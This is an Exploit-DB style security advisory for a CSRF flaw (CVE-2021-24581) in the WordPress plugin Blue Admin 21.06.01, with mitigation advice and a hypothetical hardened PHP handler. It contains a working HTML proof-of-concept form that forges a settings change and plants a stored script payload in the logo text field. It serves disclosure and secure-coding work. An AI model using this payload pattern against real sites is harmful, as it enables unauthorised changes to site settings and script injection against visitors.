Vendor: Blue Admin
By:
Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
CVSS: 8.8 (HIGH)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)
Product Name: Blue Admin
Affected Version From: <= 21.06.01
Affected Version To: <= 21.06.01
Patch Exists: YES
Related CVE: CVE-2021-24581
CPE: a:wordpress:blue_admin:21.06.01
Platforms Tested: Windows 10 Professional
Year: 2021

WordPress Plugin Blue Admin 21.06.01 – Cross-Site Request Forgery (CSRF)

A Cross-Site Request Forgery (CSRF) vulnerability exists in WordPress Plugin Blue Admin 21.06.01. The form that saves the plugin's custom login-page settings does not verify that the request was intentionally submitted by the logged-in administrator, so an attacker who gets an administrator to submit a specially crafted request can change those settings. Because the submitted values (for example the logo text) are stored and rendered on the plugin's login page without adequate sanitization or escaping, the attacker can inject arbitrary HTML and script code into the application, potentially allowing the execution of malicious code in the browsers of users who visit the login page.

Mitigation:

Developers should ensure that all user input is properly validated and sanitized before being stored, and properly escaped before being output on the page. Because the root cause is a missing CSRF check, the settings handler should also verify a WordPress nonce and the current user's capability before saving; sanitizing and escaping alone address the injected script but not the forged request.

Exploit-DB raw data:

Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Date: 2021-07-27
Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Vendor Homepage : https://wpscan.com/plugin/blue-admi
Version : <= 21.06.01
Tested on: windows 10 Professional
CVE : CVE-2021-24581

<html>
  <body>
    <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />
      <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />
      <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />
      <input type="hidden" name="ba_lp_attr[logo_img]" value="" />
      <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />
      <input type="hidden" name="ba_lp_attr[text_color]" value="222222" />
      <input type="hidden" name="ba_lp_attr[bg_img]" value="" />
      <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />
      <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />
      <input type="hidden" name="ba_lp_options_save" value="Save changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
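The plugin's own settings handler is not on this page. The following is an added, hypothetical reconstruction (not the Blue Admin plugin's code) of the shape of handler the PoC above relies on, beside a hardened version that verifies a nonce and capability, whitelists and sanitizes the ba_lp_attr keys seen in the PoC, and escapes the logo text at render time. The function names, the option key 'ba_lp_attr' and the nonce action are assumptions.

```php
<?php
// Added example, not the Blue Admin plugin's own code. Function names, the option
// key 'ba_lp_attr' and the nonce action 'ba_lp_save_options' are hypothetical.

// Vulnerable shape: any POST reaching the admin page is accepted, so a form hosted
// on another site and submitted by a logged-in admin stores attacker-chosen values.
function ba_lp_save_options_vulnerable() {
    if ( isset( $_POST['ba_lp_options_save'] ) ) {
        update_option( 'ba_lp_attr', $_POST['ba_lp_attr'] ); // no nonce, no capability check, no sanitizing
    }
}

// Hardened shape: the nonce ties the request to a form the admin actually loaded,
// the capability check limits who may save, and only known keys are stored.
function ba_lp_save_options_hardened() {
    if ( ! isset( $_POST['ba_lp_options_save'] ) ) {
        return;
    }
    // Terminates the request (HTTP 403 page) when the nonce is missing or invalid.
    check_admin_referer( 'ba_lp_save_options', 'ba_lp_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    $raw   = ( isset( $_POST['ba_lp_attr'] ) && is_array( $_POST['ba_lp_attr'] ) ) ? $_POST['ba_lp_attr'] : array();
    $clean = array(
        'logo_text'   => sanitize_text_field( wp_unslash( $raw['logo_text'] ?? '' ) ),
        'logo_url'    => esc_url_raw( wp_unslash( $raw['logo_url'] ?? '' ) ),
        'logo_img'    => esc_url_raw( wp_unslash( $raw['logo_img'] ?? '' ) ),
        'bg_img'      => esc_url_raw( wp_unslash( $raw['bg_img'] ?? '' ) ),
        // Colour fields in the PoC are hashless hex ("FFFFFF"), so keep that form.
        'fm_bg_color' => (string) sanitize_hex_color_no_hash( wp_unslash( $raw['fm_bg_color'] ?? '' ) ),
        'fm_color'    => (string) sanitize_hex_color_no_hash( wp_unslash( $raw['fm_color'] ?? '' ) ),
        'bg_color'    => (string) sanitize_hex_color_no_hash( wp_unslash( $raw['bg_color'] ?? '' ) ),
        'text_color'  => (string) sanitize_hex_color_no_hash( wp_unslash( $raw['text_color'] ?? '' ) ),
    );
    update_option( 'ba_lp_attr', $clean );
}

// The settings form must emit the matching nonce field for the hardened handler.
function ba_lp_render_nonce() {
    wp_nonce_field( 'ba_lp_save_options', 'ba_lp_nonce' );
}

// Output side: escape at render time too, so a stored value such as
// WP"><script>...</script> cannot break out of the attribute or element.
function ba_lp_render_logo( array $attr ) {
    $text = $attr['logo_text'] ?? '';
    return '<a href="' . esc_url( $attr['logo_url'] ?? '' ) . '" title="' . esc_attr( $text ) . '">'
         . esc_html( $text ) . '</a>';
}
```

The WordPress functions used (check_admin_referer, wp_nonce_field, current_user_can, sanitize_text_field, sanitize_hex_color_no_hash, esc_url_raw, esc_url, esc_attr, esc_html, wp_unslash, update_option) are core API; everything else is assumed.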